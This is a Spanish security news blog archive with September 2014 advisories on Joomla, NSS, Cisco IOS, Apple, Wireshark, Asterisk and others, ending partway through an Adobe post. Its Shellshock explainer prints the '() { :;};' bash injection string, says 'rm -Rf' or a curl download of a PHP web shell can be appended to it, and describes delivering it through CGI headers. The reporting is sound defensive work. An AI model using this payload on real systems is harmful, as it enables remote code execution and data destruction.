martes, 30 de septiembre de 2014

Google eleva las gratificaciones por encontrar vulnerabilidades

Google ha anunciado que va a elevar la cifra por encontrar vulnerabilidades en su software hasta los 15.000 dólares. La compañía considera que la seguridad de su software ha mejorado y cada vez es más difícil encontrar nuevas vulnerabilidades, por lo que éstas deben recompensarse en tal medida.

Realmente Google cuida bastante la seguridad de sus productos, basta con ver la frecuencia de actualizaciones de Google Chrome. Fruto de la colaboración con la comunidad de investigadores, Google ha corregido más de 700 vulnerabilidades en su navegador que han sido reconocidas con una cantidad total en torno al millón de euros, a través del programa de recompensa de vulnerabilidades.

Esta política ha contribuido a hacer que Chrome sea más seguro, lo que evidentemente hace que cada vez sea más difícil encontrar nuevas vulnerabilidades. Y Google se alegra de tener ese problema. Por lo que en reconocimiento del esfuerzo adicional que puede representar el encontrar nuevas vulnerabilidades en Chrome, han decidido aumentar las cantidades de las recompensas.

El anuncio más destacable, en esta ocasión, es la subida de recompensas por vulnerabilidad, que pasa a estar en el rango de los 500 dólares a los 15.000 dólares (anteriormente el máximo eran 5.000$). De forma adicional, Google reconoce estar realizando cambios para ser más transparente con los investigadores que reportan una vulnerabilidad. Por otra parte, la compañía también espera que éstas medidas ayuden a disuadir a los investigadores independientes de que vendan sus descubrimientos en el mercado negro.

Además, como siempre, se reservan el derecho de recompensar con cantidades superiores para determinados reportes que consideren de calidad. Por ejemplo, el último mes premiaron con 30.000 dólares a un informe que la propia Google califica de impresionante.

Más información:

Chrome Reward Program Rules

Fewer bugs, mo’ money

una-al-dia (26/08/2014) Google publica Chrome 37 y corrige 50 vulnerabilidades


Antonio Ropero

Twitter: @aropero

lunes, 29 de septiembre de 2014

Vulnerabilidades en Joomla!

Se han anunciado dos vulnerabilidades en Joomla! que podrían permitir a atacantes remotos realizar ataques de cross-site scripting o evitar el mecanismo de autenticación.

Joomla es un popular gestor de contenidos en código abierto, que cuenta con una gran cantidad de plantillas y componentes que un usuario puedo utilizar para implementar de manera rápida una aplicación web. Estos componentes son programados por todo tipo de desarrolladores. Este hecho, unido a su popularidad, convierten al gestor de contenidos en un objetivo muy popular para que los atacantes.

El primero de los problemas reside en que determinadas entradas en el componente "com_media" no se limpian adecuadamente antes de mostrarse al usuario. Esto podría permitir la realización de ataques de cross-site scripting con lo que el atacante podría acceder a las cookies (incluyendo las de autenticación) y a información recientemente enviada, además de poder realizar acciones en el sitio haciéndose pasar por la víctima.

Por otra parte un  error al tratar la autenticación a través de LDAP podría permitir evitar el mecanismo de autenticación.

Estas vulnerabilidades se dan en las versiones anteriores a la 3.2.5 y a la 3.3.4. Se ha solucionado en las versiones 3.2.5 y a la 3.3.4 disponibles desde www.joomla.org

Más información:

[20140902] - Core - Unauthorised Logins

[20140901] - Core - XSS Vulnerability



Antonio Ropero

Twitter: @aropero

domingo, 28 de septiembre de 2014

Apple publica iOS 8.0.2 para solucionar diversos problemas

Apenas días después del lanzamiento de iOS 8, Apple publica una nueva versión de su sistema operativo para dispositivos móviles. Esta versión está destinada a corregir los primeros problemas encontrados en la versión recién publicada.

A los pocos días de publicar iOS 8, Apple lanzó la actualización 8.0.1 destinada a corregir los primeros problemas encontrados en iOS 8, sin embargo en esta ocasión el remedio fue peor que la enfermedad. Los usuarios con iPhone 6 (e iPhone 6 Plus) vieron como sus dispositivos experimentaban fallos de cobertura, problemas con el TouchID y otras incidencias. Lo que obligó a Apple a retirar la actualización apenas transcurridas unas horas desde su publicación, e incluso recomendar a los usuarios volver a iOS 8.

Tras los problemas iniciales Apple publica iOS 8.0.2, que más que fallos de seguridad está destinada a solucionar cuestiones relacionadas con la usabilidad y funcionalidad de los dispositivos. Se solucionan los errores de conectividad y con el Touch ID en iPhone 6 e iPhone 6 Plus que dieron lugar a la retirada de iOS 8.0.1. Apple no ha detallado si la actualización referente al Touch ID es para mejorar su seguridad, en relación a los avisos que confirmaban que su funcionalidad había sido vulnerada. También corrige un fallo por el que las aplicaciones HealthKit están disponibles en la App Store. Se soluciona un problema de usabilidad en los teclados de terceras partes. 

También se ha corregido un error que impedía que diversas aplicaciones pudieran acceder a las fotos desde la Librería de Fotos. Otro problema solucionado hacía relación a un aumento del uso de datos al recibir mensajes SMS/MMS. Y por último, otros fallos corregidos hacen relación a la restauración de tonos de llamada desde copias iCloud y a la subida de fotos y vídeos desde Safari. 

Esta nueva versión está disponible para los dispositivos Apple iPhone 4S y posteriores, iPad 2 y posteriores e iPod a partir de 5ª generación. La actualización está disponible a través de iTunes o del propio dispositivo (en Ajustes/General/Actualización de software).

Más información:

iOS 8.0.2

una-al-dia (19/09/2014) Actualización masiva de productos Apple: iOS, OS X, Safari...

una-al-dia (24/09/2014) El lector de huellas del iPhone 6 sigue siendo vulnerable




Antonio Ropero
Twitter: @aropero


sábado, 27 de septiembre de 2014

Vulnerabilidad en librerías NSS permite la falsificación de certificados en diversas aplicaciones

Se ha anunciado una vulnerabilidad en las librerías NSS (Network Security Services o Servicios de Seguridad de Red) de Mozilla que podría permitir a un atacante remoto la falsificación de certificados en aplicaciones que hagan uso de estas librerías.

Los Servicios de Seguridad de Red  (Network Security Services (NSS)) son un conjunto de librerías diseñadas para ayudar a la incorporación de protocolos de seguridad en el desarrollo de aplicaciones para servidor y cliente en múltiples plataformas. Las aplicaciones desarrolladas con NSS pueden admitir SSL v2 y v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, certificados X.509 v3, y otros estándares de seguridad.

El problema, con CVE-2014-1568, reside en que la librería no trata adecuadamente valores ASN.1 en una firma digital. Un usuario podría construir un ataque de falsificación de firma contra el algoritmo RSA (una variante de uno publicado anteriormente por Daniel Bleichenbacher), con lo que podría crear un certificado falsificado.

Mozilla y Google han confirmado la vulnerabilidad en los productos Firefox, Thunderbird, SeaMonkey, NSS y Google Chrome, y han publicado versiones actualizadas de todos ellos.
Se han publicado las versiones Firefox 32.0.3, Firefox ESR 24.8.1, Firefox ESR 31.1.1, Thunderbird 31.1.2, Thunderbird 24.8.1, SeaMonkey 2.29.1, NSS 3.16.2.1, NSS 3.16.5, NSS 3.17.1 y Google Chrome 37.0.2062.124 para Windows y Mac.

Todos los proyectos que hagan uso de NSS 3.17 deben actualizar a la nueva versión 3.17.1.

Más información:

RSA Signature Forgery in NSS

Stable Channel Update


Antonio Ropero

Twitter: @aropero

viernes, 26 de septiembre de 2014

Ocho vulnerabilidades de denegación de servicio en Cisco IOS

Cisco ha publicado, como cada último miércoles de septiembre, el conjunto de actualizaciones de seguridad para IOS. En esta ocasión publicado seis boletines que solucionan ocho vulnerabilidades en su sistema operativo Cisco IOS, que podrían ser aprovechadas por atacantes para causar denegaciones de servicio.

Todas las vulnerabilidades podrían permitir a atacantes remotos sin autenticar provocar condiciones de denegación de servicio. Los problemas corregidos son una vulnerabilidad en la implementación de SIP (Session Initiation Protocol) (CVE-2014-3360) y una vulnerabilidad en la implementación de RSVP (Resource Reservation Protocol).

Otras dos vulnerabilidades residen en el tratamiento de paquetes mDNS (multicast Domain Name System) (CVE-2014-3358 y CVE-2014-3357), una vulnerabilidad en la implementación de DHCP versión 6 (DHCPv6) (CVE-2014-3359), otra vulnerabilidad en NAT (Network Address Translation) (CVE-2014-3361) y por último dos vulnerabilidades en la función de flujo de metadatos (CVE-2014-3356 y CVE-2014-3355).

Dada la diversidad de versiones y sistemas afectados se recomienda consultar los boletines publicados por Cisco, disponibles en:

Más información:

Cisco IOS Software Session Initiation Protocol Denial of Service Vulnerability

Cisco IOS Software RSVP Vulnerability

Multiple Vulnerabilities in Cisco IOS Software Multicast Domain Name System

Cisco IOS Software DHCP Version 6 Denial of Service Vulnerability

Cisco IOS Software Network Address Translation Denial of Service Vulnerability

Cisco IOS Software Metadata Vulnerabilities


Antonio Ropero
Twitter: @aropero



jueves, 25 de septiembre de 2014

Bash. Significa golpe, porrazo o castaña.

Sin lugar a dudas, una de las vulnerabilidades del año, con el permiso de lo que quede por llegar, va a ser esta que vamos a comentar. Su matrícula es CVE-2014-6271, un número que va a rebotar en la cabeza de los administradores durante bastantes meses. 

Resulta que bash, el intérprete de comandos más extendido en el mundo UNIX y derivados, tiene una curiosa y oscura funcionalidad que puede ser abusada hasta el punto de retorcerla y usarla para ejecutar código arbitrario en sistemas remotos.

Cuando lees una noticia así en una lista de seguridad te viene a la cabeza la imagen de Gandalf el Gris, detrás de ti, dándote golpecitos en la cabeza con su bastón mientras te grita "Parchea!!! Insensatooooooo". No es para menos…

Veamos primero la funcionalidad, presente desde hace años en la misma página de manual de bash:

"Functions may be exported so that subshells automatically have them defined with the -f option to the export builtin. A function definition may be deleted using the -f option to the unset builtin"

Esto es un mecanismo similar a cuando exportamos variables definidas en un entorno hacia otro proceso.

Vamos a probar la funcionalidad de manera básica:

Primero creamos una función en el intérprete

$function test { echo “hola”;}

Ahora le decimos a bash que la exporte:

$ export –f test

Creamos un nuevo interprete…

$ bash

…y llamamos a la función que acabamos de exportar:

$ test
hola

¿Dónde está el problema?

En el mecanismo que hace de exportación de esa función, la forma en la que lo hace y como interpreta el código que se inyecta en el entorno donde es exportada.

Para conseguir esa exportación de funciones bash recurre a un pequeño "truco". No exporta la función en sí, sino en una variable de entorno donde se interpreta su valor como el cuerpo de una función. Vamos a verlo modificando el ejemplo anterior, en vez de una función vamos a crear una variable de entorno:

$ test=() {echo “hola”;}

Exportamos, no una función sino una variable que es lo que haría el intérprete:

$ export test

Ahora creamos un intérprete y volvemos a invocar nuestra función 'test':

$ bash
$ test
hola

Curioso, ¿verdad?.

Bueno, pues cuando el entorno recibe esta variable y el interprete detecta la siguiente cadena ‘() {‘ entiende que está ante una función y comienza a interpretar su código. El problema y aquí entramos en la zona peligrosa, es que no para de interpretar cuando termina el cuerpo de la función y continua ejecutando el código que viene detrás del cuerpo.

Por ejemplo, si el intérprete tiene la siguiente variable-función exportada con código más allá de la definición de la función:

(){ echo “hola”; }; /bin/ls

Terminará ejecutando el ‘/bin/ls’ cuando se esté interpretando esa cadena. No hará falta invocar la función, justo cuando el interprete procese las cadenas detrás del cuerpo de la función ejecutará el comando. Idealmente, debería de terminar justo cuando encuentre el '};' correspondiente pero inexplicablemente no lo hace y peor aun ejecuta directamente ese código anexado al cuerpo de la función.

¿Por qué es peligroso?

Son muchísimos los vectores. Las variables de entorno y los intérpretes de comandos son exportados y creados en infinidad de situaciones. El peligro real, es cuando un proceso remoto acepta cadenas de entrada y hace uso de ellas a través de variables de entorno. Ahí es donde se puede inyectar una variable que contenga la cadena ‘(){‘ seguida de código arbitrario, comandos que terminarán siendo ejecutados por el proceso.

El ejemplo, ya canónico y que posiblemente veamos estampado en alguna camiseta, es la mínima expresión de definición de una función en bash ”() { :;};”

Es fácil interpretarlo, el bloque de la función definida contiene el carácter ‘:’ que en bash no hace nada, simplemente devolver cero. Su correspondiente en C sería un “return 0;”. A esa cadena por supuesto se le puede adosar cualquier comando, desde un ‘echo "yo estuve aquí" hasta un devastador "rm –Rf" o un "curl****/mi_shell.php" para depositarla en "/var/www/".

En la lista oss-security, donde se dio a conocer públicamente el problema, exponen un escenario que caracteriza el empleo de este ataque. Supongamos un script CGI que procesa las cabeceras HTTP mapeando su clave, valor a variables de entorno. No cuesta imaginar que sucede a partir de aquí. En el momento que se reciba una petición HTTP con una cabecera "cocinada" sería posible que dicho sistema termine ejecutando los comandos que se inyecten desde el exterior.

¿Quién la ha descubierto?

Su nombre es Stephane Chazelas. Francés apasionado del mundo UNIX, Chazelas no es un nombre muy conocido, hasta ahora, en la comunidad de seguridad. No se saben los detalles de cómo llegó hasta la vulnerabilidad, pero es bastante posible que gracias a sus profundos conocimientos de cómo funcionan las entrañas del sistema le proporcionará la óptica necesaria para ver aquello que otros no vieron.

Chazelas apostó por informar sobre su hallazgo a las vías adecuadas para que el problema fuese corregido antes de ser anunciado,  aunque casi al final se filtró por algún medio y se precipitó la publicación de detalles y parches.

Una reflexión

Si hacemos un repaso de las últimas vulnerabilidades podríamos ver desde cierta perspectiva que un buen grupo de ellas ya no se asientan sobre desbordamientos de memoria u otras, llamémoslas vulnerabilidades clásicas. Este tipo de errores tira más al fondo, a la lógica del diseño, un territorio donde los fuzzers comienzan a dejar de ser eficaces (no dejarán de serlo completamente) y se confía más en una comprensión del problema que solo te puede proporcionar la experiencia y la capacidad de conectar los vértices que componen la figura final.

Este tipo de errores siempre han existido y el otro tipo, los provocados por funcionalidades achacables a ciertos lenguajes (sí, C y C++, vosotros dos) no van a dejar de dar quebraderos de cabeza. Pero los problemas que derivan de un diseño inadecuado… ¿Qué IDS está preparado para ello? Quizás pueda parar una cadena pasada por Shikata Ga Nai ochocientas veces pero ¿Cómo paras una cabecera HTTP que contiene una definición de una función que va a ser exportada y de paso ejecutado el código que viene detrás? ¿Y la funcionalidad heartbeat de OpenSSL? No hay un detector de diseños defectuosos, no lo habrá nunca. Jamás.

Más información

remote code execution through bash

Bash specially-crafted environment variables code injection attack




David García
Twitter: @dgn1729


miércoles, 24 de septiembre de 2014

El lector de huellas del iPhone 6 sigue siendo vulnerable

La historia se repite, apenas días después del lanzamiento del iPhone 6 un investigador ha vuelto a conseguir saltar el sistema Touch ID de seguridad biométrica que permite al usuario utilizar su huella digital como credencial en operaciones como el bloqueo del terminal o realizar compras en las diferentes tiendas Apple.

El Touch ID se presento en los dispositivos iPhone 5s, un sensor de huellas dactilares montado en el interior del botón de casa del dispositivo. Una vez tomada la huella dactilar, esta se almacena en la zona segura del iPhone ("Secure Enclave") como una representación matemática a partir de la cual, según Apple, no se puede conoce la forma original de la huella. Esta representación no se almacena en ningún otro lugar ni es compartida con ninguna aplicación.

A los pocos días de la presentación del iPhone 5s fueron varios los investigadores que publicaron diferentes formas de saltar la protección. En esta ocasión Marc Rogers, jefe investigador de seguridad en Lookout Mobile Security, ha anunciado que ha sido capaz de desbloquear el iPhone 6, empleando la misma técnica (económica) que ya utilizara en 2013 para desbloquear el iPhone 5s.
"Sadly there has been little in the way of measurable improvement in the sensor between these two devices. Fake fingerprints created using my previous technique were able to readily fool both devices." ("Lamentablemente han sido pocas las mejoras apreciables en el sensor entre los dos dispositivos. Las huellas dactilares falsas creadas usando mi técnica anterior fueron capaces de engañar fácilmente ambos dispositivos.")
Según el investigador parece ser solamente se han realizado avances leves en el Touch ID, señala un aumento en la resolución de escaneo y por el escaneo de un área mucho más amplia de la huella dactilar para mejorar la fiabilidad. También indica que las mismas huellas falsas que conseguían engañar al iPhone 5s, no consiguen su objetivo en el nuevo dispositivo. Para engañar al iPhone 6 se requiere un clon de una huella digital de mucha mayor "calidad".

A pesar de todo el propio investigador señala que aunque el sensor de huellas puede ser saltado, la dificultad, habilidad, paciencia y el disponer de una buena copia digital confieren al sistema de la suficiente seguridad como para considerarlo eficaz para su propósito principal: el desbloqueo de su teléfono.

Más información:

Why I hacked TouchID (again) and still think it’s awesome

Why I Hacked Apple’s TouchID, And Still Think It Is Awesome.

una-al-dia (22/09/2013) El grupo Chaos Computer Club consigue saltar el sistema TouchID del iPhone 5s



Antonio Ropero
Twitter: @aropero


martes, 23 de septiembre de 2014

Microsoft vuelve a publicar la actualización MS14-055

El pasado 15 de septiembre Microsoft eliminó del centro de descargas el parche MS14-055 para Microsoft Lync Server 2010 (publicado dentro del conjunto de boletines de seguridad de septiembre). Ahora publica una nueva versión de esta actualización, con todos los problemas que motivaron su retirada ya corregidos.

Microsoft retiró la actualización 2982385 para Microsoft Lync Server 2010 perteneciente al boletín MS14-045 del "Download Center". Microsoft indicó que retiró la actualización debido a que algunos usuarios no podían instalar correctamente la actualización problemática.

Tal y como ya adelantamos, Microsoft republica el boletín MS14-055 con el que vuelve a ofrecer el archivo de actualización 2982385 y soluciona un problema en el original que impedía a los usuarios instalar el archivo server.msp. Se volverá a ofrecer la instalación a los usuarios que intentaron instalar la actualización 2982385.

Este boletín está calificado como "importante" y soluciona tres vulnerabilidades (CVE-2014-4068, CVE-2014-4070 y CVE-2014-4071) que podrían permitir a un atacante provocar denegaciones de servicio y ataques de cross-site scripting en servidores Lync 2010 y 2013.

Más información:

una-al-dia (09/09/2014) Boletines de seguridad de Microsoft de septiembre

una-al-dia (15/09/2014) Nuevo problema en las actualizaciones de Microsoft

Microsoft Security Bulletin MS14-055 - Important
Vulnerabilities in Microsoft Lync Server Could Allow Denial of Service (2990928)



Antonio Ropero
Twitter: @aropero


lunes, 22 de septiembre de 2014

Boletines de seguridad para Asterisk

Asterisk ha publicado dos boletines de seguridad (AST-2014-009 y AST-2014-010) que solucionan otras tantas vulnerabilidades que podrían permitir a atacantes remotos provocar denegaciones de servicio.

Asterisk es una implementación de una central telefónica (PBX) de código abierto. Como cualquier PBX, se pueden conectar un número determinado de teléfonos para hacer llamadas entre sí e incluso conectarlos a un proveedor de VoIP para realizar comunicaciones con el exterior. Asterisk es ampliamente usado e incluye un gran número de interesantes características: buzón de voz, conferencias, IVR, distribución automática de llamadas, etc. Además el software creado por Digium está disponible para plataformas Linux, BSD, MacOS X, Solaris y Microsoft Windows.

El primero de los problemas (AST-2014-009) reside en el tratamiento de peticiones SIP SUBSCRIBE específicamente manipuladas y podría permitir a un atacante remoto provocar condiciones de denegación de servicio (CVE-2014-6609). Este problema afecta a Asterisk Open Source 1.8.x y las ramas 11.x y 12.x; así como a Certified Asterisk 11.6 y 1.8.15. Se ha publicado la versión Asterisk Open Source 12.5.1 que soluciona este problema.

Por otra parte, en el boletín AST-2014-010, se trata una vulnerabilidad (con CVE-2014-6610) que podría permitir a atacantes remotos autenticados provocar denegaciones de servicio cuando se tratan mensajes "out of call" en determinadas configuraciones dialplan. Este problema afecta a Asterisk Open Source 11.x y 12.x; así como a Certified Asterisk 11.6.

Para corregir este problema se han publicado los siguientes parches:
Para Asterisk 11:
Para Asterisk 12:
Para Certified Asterisk 11.6:

Más información:

Remote crash when handling out of call message in certain dialplan configurations

Remote crash based on malformed SIP subscription requests


Antonio Ropero
Twitter: @aropero


domingo, 21 de septiembre de 2014

Hispasec participa en la Tercera edición del curso online de Especialización en Seguridad Informática para la Ciberdefensa en Criptored

Del 20 de Octubre al 24 de Noviembre de 2014 se impartirá la tercera edición del curso online vía WebEx de "Especialización en Seguridad Informática  y Ciberdefensa". En esta edición Javier Rascón, de Hispasec, participará como profesor en uno de los módulos. 

Orientado a Responsables de Seguridad, Cuerpos y Fuerzas de Seguridad del Estado, Agencias Militares, Ingenieros de Sistemas o similar y Estudiantes de Tecnologías de la Información. Con una duración de 40 horas y un formato consistente en 7 módulos con 20 lecciones de dos horas cada una, impartidas los días lunes, martes, miércoles y jueves de 16:00 a 18:00 horas (hora española), los profesores invitados a esta tercera edición son Chema Alonso , David Barroso, Alejandro Ramos, Sergio de los Santos, Antonio Guzmán, José Luis Verdeguer, Javier Rascón, Pedro Sánchez, Raúl Siles, David Pérez, José Picó, Antonio Calles, Pablo González, Alfonso Muñoz y Jorge Ramió.

Temario:

Módulo 1: Incidentes de ciberguerra, ciberespionaje y operaciones militares (2 horas)
Profesor: Chema Alonso - 11Paths (Telefónica Digital) 20 Octubre

Módulo 2: Ciberarmas: Malware dirigido, 0 days y RATs (2 horas)
Profesor: David Barroso - 11Paths (Telefónica Digital) 21 Octubre

Módulo 3: OSINT y ataques dirigidos APTS (14 horas)
  • Técnicas y herramientas OSINT (2 horas)
    Profesor: Chema Alonso - 11Paths (Telefónica Digital) 4 Noviembre
  • Intrusión en redes y sistemas. Metasploit Framework (4 horas)
    Profesor: Alejandro Ramos - (SecurityByDefault) 5 y 6 Noviembre
  • Contramedidas. Fortificación de sistemas Windows (2 horas)
    Profesor: Sergio de los Santos -11Paths (Telefónica Digital) - 30 Octubre
  • Protección de infraestructuras críticas. Sistemas SCADA (2 horas)
    Profesor: Antonio Guzmán -11Paths (Telefónica Digital) - 22 Octubre
  • Intrusión en redes VodIp (2 horas)
    Profesor: José Luis Verdeguer - 28 Octubre
  • Análisis automático de malware (2 horas)
    Profesor: Javier Rascón Mesa (Hispasec Sistemas) - 29 Octubre

Modulo 4. Gestión de claves. Ataques y recomendaciones (4 horas)
  • Criptografía aplicada. PKI, SSL y gestión de claves (2 horas)
    Profesor: Dr. Alfonso Muñoz y Jorge Ramió (CriptoRed) - 23 Octubre
  • Mecanismos de autenticación-identificación. Vulneración y cracking de contraseñas (gpus, rainbow tables, captchas, certificados digitales, etc.)  (2 horas) - 3 Noviembre
    Profesor: Alejandro Ramos (SecurityByDefault)

Módulo 5. Detección y fuga de información (6 horas)
  • Canales encubiertos (2 horas)
    Profesor: Alfonso Muñoz (CriptoRed) - 19 Noviembre
  • Análisis forense. Evidencias digitales (4 horas)
    Profesor: Pedro Sánchez (conexióninversa) - 17 y 18 Noviembre

Módulo 6: Protección de comunicaciones en redes móviles. WIFI, Bluetooth, GSM, GPRS, 3G (8 horas)
  • Protección de comunicaciones en redes móviles: Bluetooth y Wifi (6 horas)
    Profesor: Raúl Siles (Dinosec) - 11, 12 y 13 Noviembre
  • Protección de comunicaciones en redes móviles: GSM, GPRS, 3G (2 horas)
    Profesor: David Pérez y José Picó (Layakk) - 27 Octubre

Módulo 7: Riesgos de seguridad con dispositivos móviles. IOS, Android y BlackBerry (4 horas)
Profesor: Antonio Calles/Pablo González (Flu-project/Zink security) 20 y 24 Noviembre

La matrícula incluye en el precio 4 libros de la editorial 0xWORD como documentación y material de apoyo al contratar un curso completo. Gastos de envío en península incluidos. Gastos de envío para fuera de España (véase los descuentos en función de su proveedor local). Para inscripciones en grupo se entregará un único pack, no uno por persona.

1. Libro: Protección de comunicaciones digitales. De la cifra clásica al algoritmo RSA. Alfonso Muñoz y Jorge Ramió.
2. Libro: Esteganografía y estegoanálisis. Jordi Serra, Daniel Lerch, Alfonso Muñoz.
3. Libro: Linux exploiting. David Puente Castro.
4. Libro: Máxima Seguridad en Windows: Secretos técnicos. Sergio de los Santos.

PRECIOS

Importante: exento de IVA para residentes en Canarias o Latinoamérica. 
  • Curso completo en formato individual: 680 € + 21% IVA
  • Curso completo en formato grupo (máximo 5 asistentes): 980 € + 21% IVA

Coste por módulos en formato individual
  • Curso por módulos de 2 horas 50 € + 21% de IVA
  • Curso por módulos de 4 horas 100 € + 21% de IVA
  • Curso por módulos de 6 horas 150 € + 21% de IVA
  • Curso por módulos de 8 horas 200 € + 21% IVA
  • Curso por módulos de 14 horas 350 € + 21% IVA

Coste por módulos en formato grupo (máximo 5 personas)
  • Curso por módulos de 2 horas 75 € + 21% de IVA
  • Curso por módulos de 4 horas 150 € + 21% de IVA
  • Curso por módulos de 6 horas 250 € + 21% de IVA
  • Curso por módulos de 8 horas 300 € + 21% de IVA
  • Curso por módulos de 14 horas 525 € + 21% IVA


INSCRIPCIONES Y MÁS INFORMACIÓN EN EVENTOS CREATIVOS:
Sitio web:

Tercer curso Ciberdefensa:



Jorge Ramió Aguirre 

sábado, 20 de septiembre de 2014

Denegación de servicio en Schneider Electric’s VAMPSET software

Se ha descubierto una vulnerabilidad en VAMPSET de Schneider Electric’s, reportada por Aivar Liimets de Martem AS (Sistemas de Telecontrol). Esta vulnerabilidad permitiría a un atacante local provocar una denegación de servicio.

VAMPSET es un software de configuración especialmente utilizado en el sector energético, para mantener y configurar relés de protección. Es un software aplicado en protección de arco eléctrico, en sectores de protección y control de las redes de distribución de energía.

La vulnerabilidad, con identificador CVE-2014-5407, podría permitir a un atacante local aprovechar un error de desbordamiento de memoria intermedia basada en pila, para provocar una denegación de servicio (interrumpir la aplicación) al intentar abrir ficheros corruptos o especialmente manipulados.

Esta vulnerabilidad se ha reportado en la versión Schneider Electric VAMPSET 2.2.136 y anteriores.

Se recomienda actualizar a VAMPSET v.2.2.145 o superior.

Más información:

Important Security Notification

Vulnerability Disclosure VAMPSET

Vamp User Software



Juan Sánchez

viernes, 19 de septiembre de 2014

Actualización masiva de productos Apple: iOS, OS X, Safari…

Apple acaba de publicar actualizaciones para gran parte de sus productos. Como gran novedad destaca iOS 8, la nueva versión del sistema operativo para sus dispositivos móviles (iPhone, iPad, iPod… ). Pero además ha publicado las siguientes versiones actualizadas OS X Server 2.2.3, OS X Server 3.2.1, Safari 6.2, Safari 7.1, OS X Mavericks 10.9.5 y Security Update 2014-004, Xcode 6.0.1 y Apple TV 7.

Dada la gran cantidad de novedades y productos actualizados, vamos a realizar un breve repaso de las actualizaciones publicadas y problemas solucionados.

iOS 8 es la nueva versión del sistema operativo de Apple para sus productos móviles (iPad, iPhone, iPod…) que además de incluir cientos de novedades y mejoras (también en temas relacionados con la seguridad) además soluciona 56 nuevas vulnerabilidades. Los problemas corregidos van desde el propio kernel hasta las cuentas de usuario, WiFi, libro de direcciones, instalación de Apps, Bluetooth, CoreGraphins, Mail, etc… Una parte importante de los problemas podrían permitir a un atacante lograr ejecutar código arbitrario en los sistemas afectados.

También hay que destacar las actualizaciones para OS X que incluyen las versiones OS Server 2.2.3, OS X Server 3.2.1 y OS X Mavericks 10.9.5. La familia de servidores se ven afectados por vulnerabilidades en CoreCollaboration. Tanto OS X Server 2.2.3 como OS X Server3.2.1 solucionan una inyección SQL en el servidor Wiki, Además OS X Server 3.2.1 soluciona un cross-site scripting en el servidor Xcode y siete vulnerabilidades en PostgreSQL, la más grave de ellas podría permitir la ejecución remota de código arbitrario.

Por otra parte, también ha publicado OS X Mavericks v10.9.5 y Security Update 2014-004, destinado a corregir hasta 44 nuevas vulnerabilidades. Afectan a apache_mod_php, Bluetooth, CoreGraphics, Foundation, Intel Graphics Driver, IOAcceleratorFamily, IOHIDFamily, IOKit, Kernel, Libnotify, OpenSSL, QT Media Foundation y ruby. Una parte importante de estos problemas podrían permitir la ejecución remota de código arbitrario. Además OS X Mavericks v10.9.5 incluye la nueva versión Safari 7.0.6.

Las actualizaciones también han llegado a Safari, el popular navegador web de Apple, que se actualiza a lasversiones 6.2 y 7.1 para OS X Mountain Lion v10.8.5 y OS X Mavericks v10.9.5. Se solucionan 9 vulnerabilidades, la mayoría de ellas relacionadas con problemas de corrupción de memoria en WebKit, el motor de navegador de código abierto que es la base de Safari. Y podrían ser aprovechadas por un atacante remoto para provocar condiciones de denegación de servicio o ejecutar código arbitrario al visitar una página web específicamente creada.

Por último, Apple también ha publicado Apple TV 7 que soluciona 37 nuevas vulnerabilidades y Xcode 6.0.1, el entorno de desarrollo de Apple, que corrige una vulnerabilidad en subversión.

Más información:

iOS 8

About the security content of iOS 8

About the security content of OS X Server v2.2.3

About the security content of OS X Server v3.2.1

About the security content of Safari 6.2 and Safari 7.1

About the security content of OS X Mavericks v10.9.5 and Security Update 2014-004

About the security content of Apple TV 7

About the security content of Xcode 6.0.1



Antonio Ropero
Twitter: @aropero


jueves, 18 de septiembre de 2014

Boletines de seguridad para Wireshark

Wireshark Foundation ha publicado ocho boletines de seguridad que solucionan doce vulnerabilidades en Wireshark. Afectan a las ramas 1.10 y 1.12.

Wireshark es una aplicación de auditoría orientada al análisis de tráfico en redes muy popular que soporta una gran cantidad de protocolos y es de fácil manejo. Además Wireshark es software libre (sujeto a licencia GPL) y se encuentra disponible para la mayoría de sistemas operativos Unix y compatibles, así como Microsoft Windows.

Los boletines publicados corrigen errores relacionados con diversos disectores, que podrían ser aprovechados para provocar una denegación de servicio, bien por un excesivo consumo de recursos del sistema o causando que la aplicación deje de funcionar.

Se presentan a continuación los boletines, los disectores afectados y el identificador CVE asignado a cada uno de los fallos de seguridad:

  • wnpa-sec-2014-12: disector RTP (CVE-2014-6421 y CVE-2014-6422)
        
  • wnpa-sec-2014-13: bucle infinito relacionado con el disector MEGACO (CVE-2014-6423)
         
  • wnpa-sec-2014-14: disector Netflow (CVE-2014-6424)
         
  • wnpa-sec-2014-15: disector CUPS (CVE-2014-6425)
        
  • wnpa-sec-2014-16: bucle infinito relacionado con el disector HIP (CVE-2014-6426)
         
  • wnpa-sec-2014-17: disector RTSP (CVE-2014-6427)
         
  • wnpa-sec-2014-18: disector SES (CVE-2014-6427)
         
  • wnpa-sec-2014-19: cuatro vulnerabilidades relacionadas con el analizador DOS Sniffer (identificadores del CVE-2014-6429 al CVE-2014-6432). Descubiertas por Chaoqiang Zhang (de la Universidad del estado de Oregon, OSU) y Lewis Burns (de HP Fortify).


Todas estas vulnerabilidades podrían ser explotadas a través de la inyección de paquetes manipulados en la red, o convenciendo a un usuario para que abra un fichero de captura de tráfico especialmente manipulado.

Se encuentran afectadas las versiones de la ramas 1.10 y 1.12. Se han publicado las versiones 1.10.10 y 1.12.1, que corrigen todas las vulnerabilidades expuestas, en la página oficial.

Más información:

Download Wireshark

wnpa-sec-2014-12 · RTP dissector crash

wnpa-sec-2014-13 · MEGACO dissector infinite loop

wnpa-sec-2014-14 · Netflow dissector crash

wnpa-sec-2014-15 · CUPS dissector crash

wnpa-sec-2014-16 · HIP infinite loop

wnpa-sec-2014-17 · RTSP dissector crash

wnpa-sec-2014-18 · SES dissector crash

wnpa-sec-2014-19 · Sniffer file parser crash




Juan José Ruiz

miércoles, 17 de septiembre de 2014

Actualizaciones de seguridad para Adobe Reader y Acrobat

Adobe ha publicado una actualización para corregir ocho vulnerabilidades críticas en Adobe Reader y Acrobat en diferentes plataformas, que podrían permitir a un atacante tomar el control de los sistemas afectados.

Las versiones afectadas son Adobe Reader XI 10.0.8 (y anteriores) para Windows y Macintosh, Adobe Reader X 10.0.11 (y anteriores) para Windows y Macintosh.

